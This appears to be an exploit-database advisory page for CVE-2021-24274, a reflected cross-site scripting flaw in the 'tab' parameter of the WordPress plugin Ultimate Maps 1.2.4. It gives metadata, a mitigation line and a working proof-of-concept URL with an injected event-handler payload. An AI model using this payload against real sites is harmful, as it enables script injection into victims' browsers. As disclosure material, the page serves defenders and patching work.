header-logo
Suggest Exploit
vendor:
Ultimate Maps by Supsystic
by:
0xB9
6,1
CVSS
MEDIUM
Reflected Cross-Site Scripting (XSS)
79
CWE
Product Name: Ultimate Maps by Supsystic
Affected Version From: 1.2.4
Affected Version To: 1.2.4
Patch Exists: YES
Related CWE: CVE-2021-24274
CPE: 2.3:a:wordpress:ultimate_maps_by_supsystic:1.2.4
Metasploit: N/A
Other Scripts: N/A
Tags: wpscan,packetstorm,wordpress,cve,cve2021,wp-plugin,maps
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Nuclei Metadata: {'max-request': 1, 'framework': 'wordpress', 'vendor': 'supsystic', 'product': 'ultimate_maps'}
Platforms Tested: Windows 10
2021

WordPress Plugin Ultimate Maps 1.2.4 – Reflected Cross-Site Scripting (XSS)

WordPress Supsystic Ultimate Maps plugin before 1.2.5 contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of the tab parameter on the options page before outputting it in an attribute.

Mitigation:

Sanitize user input before outputting it in an attribute.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/ultimate-maps-by-supsystic/
# Version: 1.2.4
# Tested on: Windows 10
# CVE: CVE-2021-24274

1. Description:
The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue

2. Proof of Concept:
/wp-admin/admin.php?page=ultimate-maps-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//